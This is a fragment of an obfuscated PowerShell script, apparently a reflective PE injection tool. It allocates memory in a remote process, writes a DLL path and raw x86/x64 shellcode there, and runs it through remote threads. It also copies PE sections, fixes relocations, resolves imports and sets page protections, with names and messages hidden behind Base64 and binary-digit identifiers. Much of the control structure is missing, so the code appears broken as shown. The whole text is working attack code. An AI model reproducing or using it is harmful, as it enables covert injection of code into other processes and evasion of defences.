Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFIAZQBhAGQAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAgAGYAYQBpAGwAZQBkAA==')))
[IntPtr]${00100010011111001} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10000111100011011}, [Type][IntPtr])
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${10011010100110110}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${00110110110011110}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
[IntPtr]${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${10111111101110010} -_00011010100011100 ${10001010000101011} -Win32Functions $Win32Functions
${01111011110110011} = $Win32Functions.WaitForSingleObject.Invoke(${01011010001111011}, 20000)
if (${01111011110110011} -ne 0)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAdABvACAAYwBhAGwAbAAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAgAGYAYQBpAGwAZQBkAC4A')))
[Int32]${01011101000101011} = 0
${01111011110110011} = $Win32Functions.GetExitCodeThread.Invoke(${01011010001111011}, [Ref]${01011101000101011})
if ((${01111011110110011} -eq 0) -or (${01011101000101011} -eq 0))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEcAZQB0AEUAeABpAHQAQwBvAGQAZQBUAGgAcgBlAGEAZAAgAGYAYQBpAGwAZQBkAA==')))
[IntPtr]${00100010011111001} = [IntPtr]${01011101000101011}
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${10001010000101011}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
return ${00100010011111001}
Function _01011101100111011
Param(
[Parameter(Position=0, Mandatory=$true)]
[IntPtr]
${_10010001100101011},
[Parameter(Position=1, Mandatory=$true)]
[IntPtr]
${_01110010110011000},
[Parameter(Position=2, Mandatory=$true)]
[IntPtr]
${_10100110000101100},
[Parameter(Position=3, Mandatory=$true)]
[Bool]
${_00110010001110110}
${01001001001010110} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
[IntPtr]${10000110110110111} = [IntPtr]::Zero
if (-not ${_00110010001110110})
{
${_10100010000010100} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${_10100110000101100})
${10000010111110000} = [UIntPtr][UInt64]([UInt64]${_10100010000010100}.Length + 1)
${10000110110110111} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, ${10000010111110000}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
if (${10000110110110111} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAA==')))
[UIntPtr]${01101111010110100} = [UIntPtr]::Zero
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${10000110110110111}, ${_10100110000101100}, ${10000010111110000}, [Ref]${01101111010110100})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABEAEwATAAgAHAAYQB0AGgAIAB0AG8AIAByAGUAbQBvAHQAZQAgAHAAcgBvAGMAZQBzAHMAIABtAGUAbQBvAHIAeQA=')))
if (${10000010111110000} -ne ${01101111010110100})
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABpAGQAbgAnAHQAIAB3AHIAaQB0AGUAIAB0AGgAZQAgAGUAeABwAGUAYwB0AGUAZAAgAGEAbQBvAHUAbgB0ACAAbwBmACAAYgB5AHQAZQBzACAAdwBoAGUAbgAgAHcAcgBpAHQAaQBuAGcAIABhACAARABMAEwAIABwAGEAdABoACAAdABvACAAbABvAGEAZAAgAHQAbwAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAA==')))
}
else
{
${10000110110110111} = ${_10100110000101100}
}
${01100100100000111} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))))
${00101100001110101} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAA=='))))
${00100010101000101} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, [UInt64][UInt64]${01001001001010110}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
if (${00100010101000101} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIAB0AGgAZQAgAHIAZQB0AHUAcgBuACAAdgBhAGwAdQBlACAAbwBmACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAA==')))
[Byte[]]${00010100010111010} = @()
if (${_00110100101000100}.PE64Bit -eq $true)
${00010000001011100} = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
${01101000010001010} = @(0x48, 0xba)
${10111001001001111} = @(0x48, 0xb8)
${10111010010111000} = @(0xff, 0xd0, 0x48, 0xb9)
${00100111010100001} = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
${00010000001011100} = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
${01101000010001010} = @(0xb9)
${10111001001001111} = @(0x51, 0x50, 0xb8)
${10111010010111000} = @(0xff, 0xd0, 0xb9)
${00100111010100001} = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
${10100011000000001} = ${00010000001011100}.Length + ${01101000010001010}.Length + ${10111001001001111}.Length + ${10111010010111000}.Length + ${00100111010100001}.Length + (${01001001001010110} * 4)
${01101100010011100} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10100011000000001})
${10101000010001101} = ${01101100010011100}
_01011110000000101 -_00101110110110110 ${00010000001011100} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${00010000001011100}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${_01110010110011000}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${01101000010001010} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01101000010001010}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10000110110110111}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${10111001001001111} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${10111001001001111}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00101100001110101}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${10111010010111000} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${10111010010111000}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00100010101000101}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${00100111010100001} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${00100111010100001}.Length)
${00110110110011110} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, [UIntPtr][UInt64]${10100011000000001}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
if (${00110110110011110} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIABzAGgAZQBsAGwAYwBvAGQAZQA=')))
[UIntPtr]${01101111010110100} = [UIntPtr]::Zero
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${00110110110011110}, ${10101000010001101}, [UIntPtr][UInt64]${10100011000000001}, [Ref]${01101111010110100})
if ((${01100111110111001} -eq $false) -or ([UInt64]${01101111010110100} -ne [UInt64]${10100011000000001}))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABzAGgAZQBsAGwAYwBvAGQAZQAgAHQAbwAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAG0AZQBtAG8AcgB5AC4A')))
${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${00110110110011110} -Win32Functions $Win32Functions
${01111011110110011} = $Win32Functions.WaitForSingleObject.Invoke(${01011010001111011}, 20000)
if (${01111011110110011} -ne 0)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAdABvACAAYwBhAGwAbAAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAgAGYAYQBpAGwAZQBkAC4A')))
[IntPtr]${10000111100011011} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${01001001001010110})
${01111011110110011} = $Win32Functions.ReadProcessMemory.Invoke(${_10010001100101011}, ${00100010101000101}, ${10000111100011011}, [UIntPtr][UInt64]${01001001001010110}, [Ref]${01101111010110100})
if ((${01111011110110011} -eq $false) -or (${01101111010110100} -eq 0))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFIAZQBhAGQAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAgAGYAYQBpAGwAZQBkAA==')))
[IntPtr]${00011010010011110} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10000111100011011}, [Type][IntPtr])
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${00110110110011110}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${00100010101000101}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
if (-not ${_00110010001110110})
{
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${10000110110110111}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
}
return ${00011010010011110}
Function _10000010011101000
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Types
for( ${01101000000100101} = 0; ${01101000000100101} -lt ${_00110100101000100}.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; ${01101000000100101}++)
[IntPtr]${10010110010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.SectionHeaderPtr) (${01101000000100101} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
${00101110000000011} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010110010010000}, [Type]$Win32Types.IMAGE_SECTION_HEADER)
[IntPtr]${01011011001001010} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${00101110000000011}.VirtualAddress))
${10111000011110010} = ${00101110000000011}.SizeOfRawData
if (${00101110000000011}.PointerToRawData -eq 0)
${10111000011110010} = 0
if (${10111000011110010} -gt ${00101110000000011}.VirtualSize)
${10111000011110010} = ${00101110000000011}.VirtualSize
if (${10111000011110010} -gt 0)
_10111001011100100 -_00011000000111011 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHAAeQAtAFMAZQBjAHQAaQBvAG4AcwA6ADoATQBhAHIAcwBoAGEAbABDAG8AcAB5AA=='))) -_00110100101000100 ${_00110100101000100} -_01110111110010110 ${01011011001001010} -_00100011000001010 ${10111000011110010} | Out-Null
[System.Runtime.InteropServices.Marshal]::Copy(${_00000000110100000}, [Int32]${00101110000000011}.PointerToRawData, ${01011011001001010}, ${10111000011110010})
if (${00101110000000011}.SizeOfRawData -lt ${00101110000000011}.VirtualSize)
${01011101111101110} = ${00101110000000011}.VirtualSize - ${10111000011110010}
[IntPtr]${_01110111110010110} = [IntPtr](_01101001110001101 ([Int64]${01011011001001010}) ([Int64]${10111000011110010}))
_10111001011100100 -_00011000000111011 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHAAeQAtAFMAZQBjAHQAaQBvAG4AcwA6ADoATQBlAG0AcwBlAHQA'))) -_00110100101000100 ${_00110100101000100} -_01110111110010110 ${_01110111110010110} -_00100011000001010 ${01011101111101110} | Out-Null
$Win32Functions.memset.Invoke(${_01110111110010110}, 0, [IntPtr]${01011101111101110}) | Out-Null
Function _01101011110101010
Param(
[Parameter(Position = 0, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
${_10110001101101110},
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Types
[Int64]${10100001101110010} = 0
${00111000001000110} = $true
[UInt32]${00001111010101000} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)
if ((${_10110001101101110} -eq [Int64]${_00110100101000100}.EffectivePEHandle) `
-or (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
return
elseif ((_00010110101001010 (${_10110001101101110}) (${_00110100101000100}.EffectivePEHandle)) -eq $true)
${10100001101110010} = _10000100001010111 (${_10110001101101110}) (${_00110100101000100}.EffectivePEHandle)
${00111000001000110} = $false
elseif ((_00010110101001010 (${_00110100101000100}.EffectivePEHandle) (${_10110001101101110})) -eq $true)
${10100001101110010} = _10000100001010111 (${_00110100101000100}.EffectivePEHandle) (${_10110001101101110})
[IntPtr]${01110101010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
while($true)
${10000011100001100} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${01110101010010000}, [Type]$Win32Types.IMAGE_BASE_RELOCATION)
if (${10000011100001100}.SizeOfBlock -eq 0)
[IntPtr]${00001101100111001} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${10000011100001100}.VirtualAddress))
${00010010101110111} = (${10000011100001100}.SizeOfBlock - ${00001111010101000}) / 2
for(${01101000000100101} = 0; ${01101000000100101} -lt ${00010010101110111}; ${01101000000100101}++)
${10000000000001010} = [IntPtr](_01101001110001101 ([IntPtr]${01110101010010000}) ([Int64]${00001111010101000} + (2 * ${01101000000100101})))
[UInt16]${00110000110010111} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10000000000001010}, [Type][UInt16])
[UInt16]${01011000001101111} = ${00110000110010111} -band 0x0FFF
[UInt16]${10000101001000011} = ${00110000110010111} -band 0xF000
for (${00010011010111000} = 0; ${00010011010111000} -lt 12; ${00010011010111000}++)
${10000101001000011} = [Math]::Floor(${10000101001000011} / 2)
if ((${10000101001000011} -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
-or (${10000101001000011} -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
[IntPtr]${01010010010111100} = [IntPtr](_01101001110001101 ([Int64]${00001101100111001}) ([Int64]${01011000001101111}))
[IntPtr]${10010111110110110} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${01010010010111100}, [Type][IntPtr])
if (${00111000001000110} -eq $true)
[IntPtr]${10010111110110110} = [IntPtr](_01101001110001101 ([Int64]${10010111110110110}) (${10100001101110010}))
[IntPtr]${10010111110110110} = [IntPtr](_10000100001010111 ([Int64]${10010111110110110}) (${10100001101110010}))
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10010111110110110}, ${01010010010111100}, $false) | Out-Null
elseif (${10000101001000011} -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGsAbgBvAHcAbgAgAHIAZQBsAG8AYwBhAHQAaQBvAG4AIABmAG8AdQBuAGQALAAgAHIAZQBsAG8AYwBhAHQAaQBvAG4AIAB2AGEAbAB1AGUAOgAgACQAewAxADAAMAAwADAAMQAwADEAMAAwADEAMAAwADAAMAAxADEAfQAsACAAcgBlAGwAbwBjAGEAdABpAG8AbgBpAG4AZgBvADoAIAAkAHsAMAAwADEAMQAwADAAMAAwADEAMQAwADAAMQAwADEAMQAxAH0A')))
${01110101010010000} = [IntPtr](_01101001110001101 ([Int64]${01110101010010000}) ([Int64]${10000011100001100}.SizeOfBlock))
Function _01001001100111111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Types,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Constants,
[Parameter(Position = 4, Mandatory = $false)]
[IntPtr]
${_10010001100101011}
${01101001000001101} = $false
if (${_00110100101000100}.PEHandle -ne ${_00110100101000100}.EffectivePEHandle)
${01101001000001101} = $true
if (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
[IntPtr]${00001111100101111} = _01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
while ($true)
${00001010000101100} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${00001111100101111}, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
if (${00001010000101100}.Characteristics -eq 0 `
-and ${00001010000101100}.FirstThunk -eq 0 `
-and ${00001010000101100}.ForwarderChain -eq 0 `
-and ${00001010000101100}.Name -eq 0 `
-and ${00001010000101100}.TimeDateStamp -eq 0)
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvAG4AZQAgAGkAbQBwAG8AcgB0AGkAbgBnACAARABMAEwAIABpAG0AcABvAHIAdABzAA==')))
${10001010011100010} = [IntPtr]::Zero
${_01010010101010011} = (_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${00001010000101100}.Name))
${00111101100010100} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${_01010010101010011})
if (${01101001000001101} -eq $true)
${10001010011100010} = _01001010011111000 -_10010001100101011 ${_10010001100101011} -_01010010101010011 ${_01010010101010011}
${10001010011100010} = $Win32Functions.LoadLibrary.Invoke(${00111101100010100})
if ((${10001010011100010} -eq $null) -or (${10001010011100010} -eq [IntPtr]::Zero))
throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACAAaQBtAHAAbwByAHQAaQBuAGcAIABEAEwATAAsACAARABMAEwATgBhAG0AZQA6ACAAJAB7ADAAMAAxADEAMQAxADAAMQAxADAAMAAwADEAMAAxADAAMAB9AA==')))
[IntPtr]${10011011000001011} = _01101001110001101 (${_00110100101000100}.PEHandle) (${00001010000101100}.FirstThunk)
[IntPtr]${10010011111110111} = _01101001110001101 (${_00110100101000100}.PEHandle) (${00001010000101100}.Characteristics)
[IntPtr]${00111001000110110} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010011111110111}, [Type][IntPtr])
while (${00111001000110110} -ne [IntPtr]::Zero)
${_00110010001110110} = $false
[IntPtr]${00001000011010011} = [IntPtr]::Zero
[IntPtr]${01110001000101100} = [IntPtr]::Zero
if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]${00111001000110110} -lt 0)
[IntPtr]${00001000011010011} = [IntPtr]${00111001000110110} -band 0xffff
${_00110010001110110} = $true
elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]${00111001000110110} -lt 0)
[IntPtr]${00001000011010011} = [Int64]${00111001000110110} -band 0xffff
${_00110010001110110} = $true
[IntPtr]${10010111111111000} = _01101001110001101 (${_00110100101000100}.PEHandle) (${00111001000110110})
${10010111111111000} = _01101001110001101 ${10010111111111000} ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
${01010110000000010} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${10010111111111000})
${00001000011010011} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi(${01010110000000010})
if (${01101001000001101} -eq $true)
[IntPtr]${01110001000101100} = _01011101100111011 -_10010001100101011 ${_10010001100101011} -_01110010110011000 ${10001010011100010} -_10100110000101100 ${00001000011010011} -_00110010001110110 ${_00110010001110110}
[IntPtr]${01110001000101100} = $Win32Functions.GetProcAddressIntPtr.Invoke(${10001010011100010}, ${00001000011010011})
if (${01110001000101100} -eq $null -or ${01110001000101100} -eq [IntPtr]::Zero)
if (${_00110010001110110})
{
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBlAHcAIABmAHUAbgBjAHQAaQBvAG4AIAByAGUAZgBlAHIAZQBuAGMAZQAgAGkAcwAgAG4AdQBsAGwALAAgAHQAaABpAHMAIABpAHMAIABhAGwAbQBvAHMAdAAgAGMAZQByAHQAYQBpAG4AbAB5ACAAYQAgAGIAdQBnACAAaQBuACAAdABoAGkAcwAgAHMAYwByAGkAcAB0AC4AIABGAHUAbgBjAHQAaQBvAG4AIABPAHIAZABpAG4AYQBsADoAIAAkAHsAMAAwADAAMAAxADAAMAAwADAAMQAxADAAMQAwADAAMQAxAH0ALgAgAEQAbABsADoAIAAkAHsAMAAwADEAMQAxADEAMAAxADEAMAAwADAAMQAwADEAMAAwAH0A')))
}
else
{
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBlAHcAIABmAHUAbgBjAHQAaQBvAG4AIAByAGUAZgBlAHIAZQBuAGMAZQAgAGkAcwAgAG4AdQBsAGwALAAgAHQAaABpAHMAIABpAHMAIABhAGwAbQBvAHMAdAAgAGMAZQByAHQAYQBpAG4AbAB5ACAAYQAgAGIAdQBnACAAaQBuACAAdABoAGkAcwAgAHMAYwByAGkAcAB0AC4AIABGAHUAbgBjAHQAaQBvAG4AOgAgACQAewAwADEAMAAxADAAMQAxADAAMAAwADAAMAAwADAAMAAxADAAfQAuACAARABsAGwAOgAgACQAewAwADAAMQAxADEAMQAwADEAMQAwADAAMAAxADAAMQAwADAAfQA=')))
}
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${01110001000101100}, ${10011011000001011}, $false)
${10011011000001011} = _01101001110001101 ([Int64]${10011011000001011}) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
[IntPtr]${10010011111110111} = _01101001110001101 ([Int64]${10010011111110111}) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
[IntPtr]${00111001000110110} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010011111110111}, [Type][IntPtr])
if ((-not ${_00110010001110110}) -and (${00001000011010011} -ne [IntPtr]::Zero))
{
[System.Runtime.InteropServices.Marshal]::FreeHGlobal(${00001000011010011})
${00001000011010011} = [IntPtr]::Zero
}
${00001111100101111} = _01101001110001101 (${00001111100101111}) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
Function _00100001100110111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[UInt32]
${_01010110001101100}
${01111110100001000} = 0x0
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
${01111110100001000} = $Win32Constants.PAGE_EXECUTE_READWRITE
${01111110100001000} = $Win32Constants.PAGE_EXECUTE_READ
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
${01111110100001000} = $Win32Constants.PAGE_EXECUTE_WRITECOPY
${01111110100001000} = $Win32Constants.PAGE_EXECUTE
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
${01111110100001000} = $Win32Constants.PAGE_READWRITE
${01111110100001000} = $Win32Constants.PAGE_READONLY
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
${01111110100001000} = $Win32Constants.PAGE_WRITECOPY
${01111110100001000} = $Win32Constants.PAGE_NOACCESS
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
${01111110100001000} = ${01111110100001000} -bor $Win32Constants.PAGE_NOCACHE
return ${01111110100001000}
Function _01000100111001001
Param(
[Parameter(Position = 0, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Types
for( ${01101000000100101} = 0; ${01101000000100101} -lt ${_00110100101000100}.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; ${01101000000100101}++)
[IntPtr]${10010110010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.SectionHeaderPtr) (${01101000000100101} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
${00101110000000011} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010110010010000}, [Type]$Win32Types.IMAGE_SECTION_HEADER)
[IntPtr]${01110001011001101} = _01101001110001101 (${_00110100101000100}.PEHandle) (${00101110000000011}.VirtualAddress)
[UInt32]${11000001100000010} = _00100001100110111 ${00101110000000011}.Characteristics
[UInt32]${10001110000011011} = ${00101110000000011}.VirtualSize
[UInt32]${00100111001001011} = 0
_10111001011100100 -_00011000000111011 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBwAGQAYQB0AGUALQBNAGUAbQBvAHIAeQBQAHIAbwB0AGUAYwB0AGkAbwBuAEYAbABhAGcAcwA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0AA=='))) -_00110100101000100 ${_00110100101000100} -_01110111110010110 ${01110001011001101} -_00100011000001010 ${10001110000011011} | Out-Null
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${01110001011001101}, ${10001110000011011}, ${11000001100000010}, [Ref]${00100111001001011})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABjAGgAYQBuAGcAZQAgAG0AZQBtAG8AcgB5ACAAcAByAG8AdABlAGMAdABpAG8AbgA=')))
Function _00001000001100111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants,
[Parameter(Position = 3, Mandatory = $true)]
[String]
${_10110001000000101},
[Parameter(Position = 4, Mandatory = $true)]
[IntPtr]
${_10111110001100110}
${10100010011001001} = @()
${01001001001010110} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
[UInt32]${00100111001001011} = 0
[IntPtr]${01100100100000111} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))))
if (${01100100100000111} -eq [IntPtr]::Zero)
